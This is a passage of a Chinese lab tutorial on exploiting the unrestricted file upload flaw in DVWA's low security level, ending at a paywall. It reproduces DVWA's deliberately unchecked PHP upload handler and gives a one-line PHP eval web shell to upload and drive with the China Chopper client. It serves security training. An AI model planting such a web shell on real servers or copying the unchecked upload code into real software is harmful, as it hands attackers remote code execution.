目录
1、low级别(直接上传)
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
PHP端实现文件上传的功能,不设置任何的检测,可以上传任意类型、任意大小的文件。
所以可以直接上传shell文件,上传完成后使用菜刀。
1.1 上传文件
shell.php文件的内容如下,只有一句话:
<?php @eval($_POST['123']);?>
在DVWA进行文件上传。

为了验证是否上传成功,可以进入这个网址,如果不出现NOT FOUND说明上传成功;
![]()
也可以去靶机下进行查看,靶机中的路径为/var/www/dvwa/hackable/uploads。

本文详细介绍在DVWA平台上针对不同级别的文件上传漏洞的利用方法,包括直接上传、使用BurpSuite代理上传以及通过文件合并绕过限制的技术细节。
最低0.47元/天 解锁文章
2211

被折叠的 条评论
为什么被折叠?



